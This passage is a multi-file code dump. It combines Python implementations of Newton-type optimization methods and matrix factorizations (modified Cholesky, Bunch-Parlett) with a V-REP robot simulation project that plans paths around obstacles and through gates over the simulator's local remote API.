    x0 = np.array([-3, -1, -3, -1])
    f_funciton = functions.wood
    diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
    g_function = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
    hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
    G_function = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
    write_latex_name = "Wood.txt"
# Disabled experiment: run all nine configurations in a process pool.
# results = []
# pool = multiprocessing.Pool(processes=len(hyper_parameters_list))
# for method_idx in range(len(hyper_parameters_list)):
#     results.append([pool.apply_async(method_list[method_idx], (x0, f_funciton, g_function, G_function, hyper_parameters_list[method_idx], ))])
# pool.close()
# pool.join()
# Run the nine (method x line-search) configurations sequentially and write
# one LaTeX table row per run into write_latex_name.
logger.info("== " * 20 + " {} ".format(write_latex_name) + "== " * 20)
write_latex = open(write_latex_name, 'w')
write_latex.write("\hline\n")
# --- Damped Newton: ELS / ILS / GLL ---
logger.info("精确线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
# --- GM stabilized Newton: ELS / ILS / GLL ---
logger.info("精确线搜索下的GM稳定牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的GM稳定牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的GM牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
# --- Fletcher-Freeman: ELS / ILS / GLL ---
logger.info("精确线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
    fx = format(func_X_star, ".4e"),
    iter_num = str(iter_num),
    func_k = str(function_num),
    is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
write_latex.close()
--- FILE SEPARATOR ---
import math
import copy
import numpy as np
from goto import with_goto
import logging

# Module-wide logging: timestamped records with file/line info, DEBUG level.
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
                    datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def modified_Cholesky(G, hyper_parameters=None, u=1e-20):
    """Modified Cholesky factorization (Gill–Murray style): G + E = L*D*L^T.

    Args:
        G ([np.array]): two-dimensional matrix to factorize
        hyper_parameters: (Dic): hyper-parameters; may contain:
            u: machine precision

    Returns:
        (L, D): unit lower-triangular L and positive diagonal D.
    """
    if hyper_parameters is not None:
        u = hyper_parameters['u']
    # Step 1: initialization
    G = np.array(G)
    gamma = 0  # largest |diagonal| element
    ksai = 0   # largest |off-diagonal| element
    n = len(G)
    for i in range(n):
        for j in range(n):
            if i == j:
                gamma = max(gamma, abs(G[i][i]))
            else:
                ksai = max(ksai, abs(G[i][j]))
    # beta^2 bounds the subdiagonal growth; delta is the minimum allowed pivot.
    beta_2 = max(gamma, ksai / math.sqrt(n ** 2 - 1), u)
    delta = u * max(gamma + ksai, 1)
    assert delta > 0 , "must have delta > 0"
    L = np.eye(n, dtype=float)
    D = np.zeros((n,n), dtype=float)
    C = np.zeros((n,n), dtype=float)
    # Computed column by column; j is 1-based, hence the j-1 offsets below.
    j = 1  # index of the column currently being computed
    # Step 2: compute dj'
    label .step2
    dj_prime = max(delta, abs(G[j - 1][j - 1] - sum((C[j - 1][r - 1] ** 2 / (D[r - 1][r - 1]) for r in range(1, j))) ) )
    # Step 3: compute Cij
    for i in range(j + 1, n + 1):
        C[i - 1][j - 1] = G[i - 1][j - 1] - sum(( L[j - 1][r - 1] * C[i - 1][r - 1] for r in range(1, j)))
    # Step 4: compute theta_j (largest |C| below the diagonal in column j)
    theta_j = 0
    if j < n:
        theta_j = max(( abs(C[i - 1][j - 1]) for i in range(j + 1, n + 1)))
    # Step 5: compute d_j, keeping the pivot large enough to bound L's entries
    D[j - 1][j - 1] = max(dj_prime, theta_j ** 2 / beta_2)
    # Step 6: compute l_ij
    for i in range(j + 1, n + 1):
        L[i - 1][j - 1] = C[i - 1][j - 1] / D[j - 1][j - 1]
    # Step 7: advance j; stop once all n columns are done
    if j + 1 <= n:
        j += 1
        goto .step2
    else:
        return L, D
def get_modified_G(L, D):
    """Reconstruct G' = L·D·Lᵀ from the factors of a modified-Cholesky/BP decomposition.

    Args:
        L (np.array): unit lower-triangular factor.
        D (np.array): (block-)diagonal factor.

    Returns:
        np.array: the product L·D·Lᵀ.
    """
    # The original deep-copied L before transposing; .T is a cheap view, so the
    # copy was pure overhead. The product is mathematically identical.
    return np.dot(np.dot(L, D), L.T)
@with_goto
def Bunch_Parlett(A):
    """Bunch–Parlett factorization of a symmetric matrix: P A P^T = L D L^T.

    D is block-diagonal with 1x1 and 2x2 blocks; the pivot type is chosen by
    comparing the largest diagonal vs off-diagonal elements of the trailing
    submatrix.

    Args:
        A ([np.array]): input symmetric matrix

    Returns:
        (L, D, y): the factors plus y, the variable order after all the
        row/column exchanges performed while pivoting.
    """
    # Step 1: initialization
    A_ = copy.deepcopy(A)
    n = len(A)
    D = np.zeros((n, n))
    L = np.zeros((n, n))
    # record the variable order (permutation built up by the pivot swaps)
    y = np.array(range(n))
    k, m = 1, 0  # k: pivot-step counter; m: rows/columns already eliminated
    # Step 2: largest diagonal element of the trailing (n-m) submatrix
    label .step2
    a_tt = 0
    t = -1
    for i in range(m, n):
        if abs(A_[i][i]) > a_tt:
            a_tt = abs(A_[i][i])
            t = i
    # Step 3: largest off-diagonal element of the trailing (n-m) submatrix
    a_ls = 0
    l, s = -1, -1
    if m < n - 1:
        for i in range(m, n):
            for j in range(m, i):
                if abs(A_[i][j]) > a_ls:
                    a_ls = abs(A_[i][j])
                    l = i
                    s = j
    # Step 4: choose the branch by comparing the two maxima
    if a_tt == 0 and a_ls == 0:
        goto .step8
    elif a_tt < 2.0 / 3 * a_ls:
        goto .step6
    # Step 5: 1*1 pivot block
    # print("第{k}步是 1 * 1的块:".format(k=k))
    # print("第{k}步最初的A:".format(k=k))
    # print(A_)
    # swap rows/columns to bring the pivot to position m
    A_[[m, t], :] = A_[[t, m], :]
    A_[:, [m, t]] = A_[:, [t, m]]
    # print("交换行列后的A:".format(k=k))
    # print(A_)
    # y must be swapped as well
    y[m], y[t] = y[t], y[m]
    # L must be swapped as well
    L[[m, t], :] = L[[t, m], :]
    L[:, [m, t]] = L[:, [t, m]]
    # write the pivot into D and eliminate the rest of column m
    D[m][m] = A_[m][m]
    L[m][m] = 1
    L[m + 1:, m] = A_[m + 1:, m] / A_[m][m] # the arithmetic already allocates new storage, no deepcopy needed
    # print(np.dot((L[m:, m] * D[m][m]).reshape(n-m,1) , L[m:, m].reshape(1,n-m)))
    A_[m:, m:] -= np.dot((L[m:, m] * D[m][m]).reshape(n-m,1) , L[m:, m].reshape(1,n-m))
    m += 1
    # print("消解之后A是")
    # print(A_)
    # print("消解之后L是")
    # print(L)
    # print("消解之后D是")
    # print(D)
    goto .step7
    # Step 6: 2*2 pivot block
    label .step6
    # Since l > s: row/col l goes to m+1 and row/col s goes to m.
    # NOTE: when m+1 == s, doing both exchanges in one statement could go
    # wrong, so the m<->s swap must be written first.
    A_[[m, s], :] = A_[[s, m], :]
    A_[[m + 1, l], :] = A_[[l, m+1], :]
    A_[:, [m, s]] = A_[:, [s, m]]
    A_[:, [m + 1, l]] = A_[:, [l, m + 1]]
    # L must be swapped as well
    L[[m, s], :] = L[[s, m], :]
    L[[m + 1, l], :] = L[[l, m+1], :]
    L[:, [m, s]] = L[:, [s, m]]
    L[:, [m + 1, l]] = L[:, [l, m + 1]]
    # print("交换行列后的A:".format(k=k))
    # print(A_)
    y[m], y[s] = y[s], y[m]
    y[m + 1], y[l] = y[l], y[m + 1],
    # copy the 2x2 pivot into D and eliminate below it
    D[m: m + 2, m: m + 2] = copy.deepcopy(A_[m: m + 2, m: m + 2])
    L[m: m + 2, m: m + 2] = np.eye(2) # 2x2 identity block
    # print("交换行列后的A是")
    # print(A_)
    L[m + 2:, m: m + 2] = np.dot(A_[m + 2:, m: m + 2] , np.linalg.inv(A_[m: m + 2, m: m + 2]))
    A_[m:, m:] -= np.dot( np.dot(L[m:, m: m + 2].reshape(n-m,2) , D[m: m + 2, m: m + 2]), np.mat(L[m:, m: m + 2]).T)
    m += 2
    # print("消解之后A是")
    # print(A_)
    # print("消解之后L是")
    # print(L)
    # print("消解之后D是")
    # print(D)
    # Step 7: loop until the whole matrix has been eliminated
    label .step7
    if m < n:
        k += 1
        goto .step2
    # Step 8
    label .step8
    return L, D, y
def is_pos_def(A):
    """Return True when the symmetric matrix A is positive definite.

    A Cholesky factorization exists exactly for positive definite matrices,
    so we simply attempt one and report whether it succeeded.
    """
    try:
        np.linalg.cholesky(A)
    except np.linalg.LinAlgError:
        return False
    return True
if __name__ == '__main__':
    # Ad-hoc demo / manual test: factorize a small symmetric matrix with the
    # BP routine and rebuild it from the factors as a sanity check.
    G = np.array([[1, 1, 2],
                  [1, 1+1e-20, 3],
                  [2, 3, 1]])
    # print("修正Cholesky分解")
    # L, D = modified_Cholesky(G)
    # G_ = get_modified_G(L, D)
    # print("L 是:")
    # print(L)
    # print("D 是:")
    # print(D)
    # print("修正过的G 是:")
    # print(G_)
    # G_1 = np.linalg.inv(G_)
    # print(G_1)
    # print("BP分解")
    # L, D, y= Bunch_Parlett(G)
    # G_ = get_modified_G(L, D)
    # print("L 是:")
    # print(L)
    # print("D 是:")
    # print(D)
    # print("修正过的G 是:")
    # print(G_)
    # G = np.array([[11202, 1200, 0, 0],
    # [1200, 220.200000000000, 0, 19.8000000000000],
    # [0, 0, 10082, 1080],
    # [0, 19.8000000000000, 1080, 200.200000000000]])
    # The first G above is overwritten here; only the BP run below executes.
    G = np.array(
        [[1, 1, 2],
         [1, 2, 3],
         [2, 3, 1]],
        dtype = float
    )
    print("BP分解")
    L, D, y= Bunch_Parlett(G)
    G_ = get_modified_G(L, D)
    print("L 是:")
    print(L)
    print("D 是:")
    print(D)
    print("修正过的G 是:")
    print(G_)
    # from scipy.linalg import ldl
    # lu, d, perm = ldl(np.array(G, dtype=float), lower=1)
    # print("LDL 的 L是 ")
    # print(lu[perm, :])
    # print("LDL 的 D是")
    # print(d)
    # G_ = get_modified_G(lu, d)
    # print("修正过的G 是:")
    # print(G_)
|
[
"/Large_Scale_Methods/L_SR1.py",
"/Line_Search/GLL.py",
"/Line_Search/exact_line_search.py",
"/Line_Search/inexact_line_search.py",
"/Newton_Methods/fletcher_freeman.py",
"/Newton_Methods/inexact_newton_method.py",
"/Newton_Methods/newton_method.py",
"/Trust_Region_Methods/sorensen.py",
"/Trust_Region_Methods/trust_region_main.py",
"/Trust_Region_Methods/two_subspace_min.py",
"/functions.py",
"/newton_methods_main.py",
"/utils.py"
] |
0000duck/vrep
|
#!python3
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
import math
import heapq
import time
try:
import vrep
except:
print ('--------------------------------------------------------------')
print ('"vrep.py" could not be imported. This means very probably that')
print ('either "vrep.py" or the remoteApi library could not be found.')
print ('Make sure both are in the same folder as this file,')
print ('or appropriately adjust the file "vrep.py"')
print ('--------------------------------------------------------------')
print ('')
class Entity:
    """Lightweight record for one map element.

    Depending on `type` the instance carries different attributes:
    'Point' -> x, y; 'Obstacle' -> x, y, r (circle); 'Gate' -> the two
    endpoints (x1, y1) and (x2, y2).
    """

    def __init__(self, type, name, x=0.0, y=0.0, r=0, x1=0.0, x2=0.0, y1=0.0, y2=0.0):
        self.type = type
        self.name = name
        if type == 'Point':
            self.x, self.y = x, y
        elif type == 'Obstacle':
            self.x, self.y = x, y
            self.r = r
        elif type == 'Gate':
            self.x1, self.y1 = x1, y1
            self.x2, self.y2 = x2, y2
class Record:
    """Search-state node: location index, distance so far, packed gate/target
    progress, and the '$'-separated path of point indices."""

    def __init__(self, loc=-1, dis=0, gate=0, path=''):
        self.loc = loc
        self.dis = dis
        self.gate = gate
        self.path = path
        # Key combining location and progress, so distinct states are tracked
        # separately in the heap's best-distance table.
        self.hash = '{0}${1}'.format(loc, self.gate)

    def __lt__(self, other):
        # Order records by accumulated distance (min-heap friendly).
        return self.dis < other.dis
class Heap:
    """Min-heap of records keyed by distance, with a best-known-distance
    table so dominated states are never pushed twice."""

    def __init__(self):
        self.heap = []
        self.hash = {}

    def push(self, record):
        best = self.hash.get(record.hash, 1e+10)
        if best <= record.dis + 1e-6:
            # An equal-or-better record for this state is already known.
            return
        self.hash[record.hash] = record.dis
        heapq.heappush(self.heap, (record.dis, record))

    def top(self):
        return self.heap[0][1]

    def pop(self):
        return heapq.heappop(self.heap)[1]
class Search:
    """Path search over a roadmap of points, circular obstacles and gates.

    Dijkstra-style search (via Heap) whose state is (location, packed
    gate/target progress); the goal is to reach the targets in order while
    crossing the required number of distinct gates.
    """

    def __init__(self, entities, clientID):
        # entities: list of Entity records describing the scene.
        # clientID: V-REP remote-API handle, used only to reposition marker
        # objects after a successful search.
        self.entities = entities
        self.clientID = clientID

    def distance_between_points(self, p1, p2):
        # NOTE: returns the SQUARED distance; callers take sqrt where needed.
        return (p1.x - p2.x)**2 + (p1.y - p2.y)**2

    def check_point_in_obstacle(self, point, obstacle):
        # Squared-distance comparison avoids the sqrt.
        return self.distance_between_points(point, obstacle) <= obstacle.r**2

    def check_insection_with_obstacle(self, point1, point2, obstacle):
        """True when segment point1-point2 passes within obstacle.r of its centre."""
        p1_to_o = math.sqrt(self.distance_between_points(point1, obstacle))
        p2_to_o = math.sqrt(self.distance_between_points(point2, obstacle))
        p1_to_p2 = math.sqrt(self.distance_between_points(point1, point2))
        # Heron's formula gives the triangle area, hence the perpendicular
        # distance ("high") from the obstacle centre to the segment's line.
        half = (p1_to_o + p2_to_o + p1_to_p2) / 2.0
        s = math.sqrt(half * (half - p1_to_o) * (half - p2_to_o) * (half - p1_to_p2))
        high = s * 2 / p1_to_p2
        p1_b = math.sqrt(p1_to_o**2 - high**2)
        p2_b = math.sqrt(p2_to_o**2 - high**2)
        # If the foot of the perpendicular lies between the endpoints use the
        # perpendicular distance, otherwise the nearer endpoint's distance.
        if abs(p1_b + p2_b - p1_to_p2) < 1e-4:
            dis = high
        else:
            dis = min(p1_to_o, p2_to_o)
        return dis < obstacle.r

    def draw(self, type='A'):
        """Plot the scene with matplotlib; `type` selects what is shown.

        'A': raw entities; 'B'/'C': built roadmap points and obstacles;
        'C'/'D': additionally the found path; 'D': gate points + obstacles.
        """
        if type == 'A':
            for entity in self.entities:
                if entity.type == 'Point':
                    if entity.name == 'Target0':
                        plt.scatter(entity.x, entity.y, c='r')
                    elif entity.name == 'Target1':
                        plt.scatter(entity.x, entity.y, c='g')
                    elif entity.name == 'Target2':
                        plt.scatter(entity.x, entity.y, c='b')
                    else:
                        print (entity.name)
                elif entity.type == 'Obstacle':
                    # Approximate the circle with 1000 sample points.
                    xs = [entity.x + entity.r * math.cos(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
                    ys = [entity.y + entity.r * math.sin(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
                    plt.plot(xs, ys, c='k')
                elif entity.type == 'Gate':
                    plt.scatter(entity.x1, entity.y1, c='k')
                    plt.scatter(entity.x2, entity.y2, c='k')
                else:
                    print (entity.type, entity.name)
        if type == 'B' or type == 'C':
            cnt = 0
            for entity in self.points:
                if entity.name == 'Target0':
                    plt.scatter(entity.x, entity.y, c='r')
                elif entity.name == 'Target1':
                    plt.scatter(entity.x, entity.y, c='g')
                elif entity.name == 'Target2':
                    plt.scatter(entity.x, entity.y, c='b')
                else:
                    plt.scatter(entity.x, entity.y, c='k', label = 'P'+str(cnt))
                    cnt += 1
        if type == 'D':
            for entity in self.points:
                if 'Gate' in entity.name:
                    plt.scatter(entity.x, entity.y, c='k')
        if type == 'B' or type == 'C' or type == 'D':
            for entity in self.obstacles:
                xs = [entity.x + entity.r * math.cos(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
                ys = [entity.y + entity.r * math.sin(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
                plt.plot(xs, ys, c='k')
        if type == 'C' or type == 'D':
            xs = [item.x for item in self.answers]
            ys = [item.y for item in self.answers]
            plt.plot(xs, ys, c='y')
        plt.show()

    def build(self, divided = 10):
        """Build the roadmap.

        Collect entity points, split each gate into its two side points,
        overlay a (divided+1)^2 grid over the padded bounding box, then drop
        every candidate point that falls inside an obstacle.
        """
        self.obstacles = []
        self.points = []
        cnt = 0
        for entity in self.entities:
            if entity.type == 'Point':
                self.points.append(entity)
            elif entity.type == 'Obstacle':
                self.obstacles.append(entity)
            elif entity.type == 'Gate':
                # Each gate contributes its two side points (A and B ends);
                # the numeric suffix identifies the gate.
                self.points.append(Entity(type='Point', name='GateA'+str(cnt), x=entity.x1, y=entity.y1))
                self.points.append(Entity(type='Point', name='GateB'+str(cnt), x=entity.x2, y=entity.y2))
                cnt += 1
            else:
                print ('Error')
        # Bounding box of all points and obstacles, padded by 2 units.
        self.minx = self.maxx = self.points[0].x
        self.miny = self.maxy = self.points[0].y
        for point in self.points:
            self.minx = min(self.minx, point.x)
            self.miny = min(self.miny, point.y)
            self.maxx = max(self.maxx, point.x)
            self.maxy = max(self.maxy, point.y)
        for obstacle in self.obstacles:
            self.minx = min(self.minx, obstacle.x - obstacle.r)
            self.miny = min(self.miny, obstacle.y - obstacle.r)
            self.maxx = max(self.maxx, obstacle.x + obstacle.r)
            self.maxy = max(self.maxy, obstacle.y + obstacle.r)
        self.minx -= 2
        self.miny -= 2
        self.maxx += 2
        self.maxy += 2
        cnt = 0
        # Regular grid of waypoint candidates over the bounding box.
        # NOTE(review): cnt is never incremented in this loop, so every grid
        # point is named 'Point0'; names of grid points are not used by the
        # search, but confirm this is intended.
        for i in range(divided+1):
            for j in range(divided+1):
                x = self.minx + (self.maxx - self.minx) * i / divided
                y = self.miny + (self.maxy - self.miny) * j / divided
                self.points.append(Entity(type='Point', name='Point'+str(cnt), x=x, y=y))
        # Keep only the points that lie outside every obstacle.
        newpoints = []
        for point in self.points:
            flag = True
            for obstacle in self.obstacles:
                if self.check_point_in_obstacle(point, obstacle):
                    flag = False
                    break
            if flag:
                newpoints.append(point)
        self.points = newpoints

    def search(self, targetnum=2, gatenum=4):
        """Dijkstra over (point, progress) states.

        `record.gate` packs the state as gatevalue*100 + gatenum*10 +
        targetnum: the ones digit counts targets reached in order, the tens
        digit counts distinct gates crossed, the remainder is a bitmask of
        crossed gate ids. On success the path is printed and mirrored into
        V-REP via self.clientID.
        """
        name_to_entity = {}
        name_to_number = {}
        cnt = 0
        for point in self.points:
            name_to_entity[point.name] = point
            name_to_number[point.name] = cnt
            cnt += 1
            #print (point.name)
        heap = Heap()
        loc = name_to_number['Target0']
        record = Record(loc=loc, dis=0, gate=0, path=str(loc))
        heap.push(record)
        starttime = time.time()
        answer = None
        # Precompute pairwise visibility: two points connect when the segment
        # between them misses every obstacle.
        connect = {}
        for i in range(len(self.points)):
            for j in range(len(self.points)):
                flag = True
                if i==j:
                    flag = False
                else:
                    for obstacle in self.obstacles:
                        if self.check_insection_with_obstacle(self.points[i], self.points[j], obstacle):
                            flag = False
                            break
                connect[str(i) + '$' + str(j)] = flag
        while len(heap.heap):
            record = heap.pop()
            # Skip stale heap entries superseded by a better distance.
            if heap.hash.get(record.hash) < record.dis:
                continue
            # Unpack the packed progress state (see docstring).
            old_targetnum = record.gate % 10
            old_gatenum = record.gate % 100 // 10
            old_gatevalue = record.gate // 100
            #print ('search ', record.gate, record.dis)
            #print ('\t\t', record.path)
            if old_targetnum == targetnum and old_gatenum == gatenum:
                answer = record
                break
            for loc in range(len(self.points)):
                if loc == record.loc:
                    continue
                if not connect[str(loc) + '$' + str(record.loc)]:
                    continue
                new_dis = record.dis + math.sqrt(self.distance_between_points(self.points[record.loc], self.points[loc]))
                new_path = record.path + '$' + str(loc)
                # Targets must be visited in order (Target1 before Target2).
                if self.points[loc].name == 'Target' + str(old_targetnum + 1):
                    new_targetnum = old_targetnum + 1
                    #print ('\t\t\ttarget', record.loc, loc, old_targetnum, self.points[loc].name, new_targetnum, new_dis)
                else:
                    new_targetnum = old_targetnum
                name1 = self.points[record.loc].name
                name2 = self.points[loc].name
                new_gatenum = old_gatenum
                new_gatevalue = old_gatevalue
                # Crossing a gate means moving between the A and B ends of the
                # same gate id; the bitmask counts each gate only once.
                if 'Gate' in name1 and 'Gate' in name2:
                    if 'GateB' in name1:
                        name1, name2 = name2, name1
                    if 'GateA' in name1 and 'GateB' in name2 and name1[5:] == name2[5:]:
                        number = 1<<int(name1[5:])
                        if number & old_gatevalue == 0:
                            new_gatenum += 1
                            new_gatevalue |= number
                new_record = Record(loc=loc, dis=new_dis, gate=new_gatevalue*100+new_gatenum*10+new_targetnum, path=new_path)
                heap.push(new_record)
        print ('Time ', time.time() - starttime)
        if answer is None:
            print ('No answer')
        else:
            print ('Answer')
            print (answer.dis)
            print (answer.path)
            self.answers = [self.points[int(item)] for item in answer.path.split('$')]
            print (len(self.answers))
            count = 0
            # Mirror the found path into V-REP by moving marker objects named
            # 'target<k>'; the z coordinate encodes the point kind (1/2 for
            # targets, 3/4 for gate A/B ends, 0 otherwise).
            for point in self.answers:
                print ('\t', point.x, point.y, point.name)
                res, handle = vrep.simxGetObjectHandle(self.clientID, 'target'+str(count), vrep.simx_opmode_blocking)
                if point.name=='Target1':
                    res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 1], vrep.simx_opmode_blocking)
                elif point.name=='Target2':
                    res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 2], vrep.simx_opmode_blocking)
                elif point.name[0]=='G':
                    if point.name[4]=='A':
                        res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 3], vrep.simx_opmode_blocking)
                    else:
                        res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 4], vrep.simx_opmode_blocking)
                else:
                    res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 0], vrep.simx_opmode_blocking)
                count += 1
if __name__ == '__main__':
    # Smoke test for the segment/circle intersection check.
    # BUG FIX: Search.__init__ requires (entities, clientID); the original
    # call Search([]) raised TypeError before the check ever ran. clientID is
    # only used when mirroring results into V-REP, so None is fine here.
    search = Search([], None)
    point1 = Entity(type='Point', name='Tmp1', x=0, y=0)
    point2 = Entity(type='Point', name='Tmp2', x=10, y=0)
    obstacle = Entity(type='Obstacle', name='Tmp3', x=-4, y=3, r=4.9)
    print (search.check_insection_with_obstacle(point1, point2, obstacle))
--- FILE SEPARATOR ---
#!python3
# -*- coding:utf-8 -*-
# Make sure to have the server side running in V-REP:
# in a child script of a V-REP scene, add following command
# to be executed just once, at simulation start:
#
# simRemoteApi.start(19999)
#
# then start simulation, and run this program.
#
# IMPORTANT: for each successful call to simxStart, there
# should be a corresponding call to simxFinish at the end!
try:
import vrep
except:
print ('--------------------------------------------------------------')
print ('"vrep.py" could not be imported. This means very probably that')
print ('either "vrep.py" or the remoteApi library could not be found.')
print ('Make sure both are in the same folder as this file,')
print ('or appropriately adjust the file "vrep.py"')
print ('--------------------------------------------------------------')
print ('')
import time
from entity import Entity, Search
if __name__ == '__main__':
    #print ('Program started')
    vrep.simxFinish(-1) # just in case, close all opened connections
    clientID = vrep.simxStart('127.0.0.1', 19999, True, True, 5000, 5) # Connect to V-REP
    #print (clientID)
    if clientID!=-1:
        print ('Connected to remote API server')
        ##########
        # Map of scene object names to the role they play in the planner.
        objects = {
            'Tree': 'Tree',
            'Tree#0': 'Tree',
            'Cylinder': 'Cylinder',
            'Start_point': 'Start',
            'Target': 'Target',
            'End': 'End',
            'UR3': 'UR',
            'UR3#0': 'UR',
            'GateCounter_55cmX40cm': 'Gate',
            'GateCounter_55cmX40cm#0': 'Gate',
            'GateCounter_55cmX40cm#1': 'Gate',
            'GateCounter_80cmX190cm': 'Gate',
            'GateCounter_80cmX190cm#0': 'Gate',
            'GateCounter_80cmX190cm#1': 'Gate',
            'GateCounter_80cmX190cm#2': 'Gate',
        }
        entities = []
        for key, value in objects.items():
            if value in ['Tree', 'UR', 'Cylinder']:
                # Obstacles: position from the scene, radius by object kind.
                res, handle = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
                res, position = vrep.simxGetObjectPosition(clientID, handle, -1, vrep.simx_opmode_blocking)
                entity = Entity(type='Obstacle', name=key, x=position[0], y=position[1], r=2.0 if value != 'Cylinder' else 1.0)
            elif value == 'Start':
                res, handle = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
                res, position = vrep.simxGetObjectPosition(clientID, handle, -1, vrep.simx_opmode_blocking)
                name ='Target0' if value == 'Start' else 'Target1' if value == 'Target' else 'Target2' if value == 'End' else 'Error'
                entity = Entity(type='Point', name=name, x=position[0], y=position[1])
            elif value in ['Target', 'End']:
                # These positions come from a customization-script helper
                # function, not from the object pose itself.
                function_name = "get_target_platform_pos" if value == 'Target' else "get_end_point_pos"
                res, _, position, _, _ = vrep.simxCallScriptFunction(clientID, "util_funcs", vrep.sim_scripttype_customizationscript,function_name, [], [], [],bytearray(), vrep.simx_opmode_blocking)
                name ='Target0' if value == 'Start' else 'Target1' if value == 'Target' else 'Target2' if value == 'End' else 'Error'
                entity = Entity(type='Point', name=name, x=position[0], y=position[1])
            elif value == 'Gate':
                # Probe the gate's two side points by moving the helper
                # object 'Tmp' +-2 units along the gate's local x axis and
                # reading back its world position each time.
                res, handle1 = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
                res, handle2 = vrep.simxGetObjectHandle(clientID, 'Tmp', vrep.simx_opmode_blocking)
                res, position1 = vrep.simxGetObjectPosition(clientID, handle1, -1, vrep.simx_opmode_blocking)
                vrep.simxSetObjectPosition(clientID, handle2, handle1, (2,0,0), vrep.simx_opmode_blocking)
                res, position2 = vrep.simxGetObjectPosition(clientID, handle2, -1, vrep.simx_opmode_blocking)
                vrep.simxSetObjectPosition(clientID, handle2, handle1, (-2,0,0), vrep.simx_opmode_blocking)
                res, position3 = vrep.simxGetObjectPosition(clientID, handle2, -1, vrep.simx_opmode_blocking)
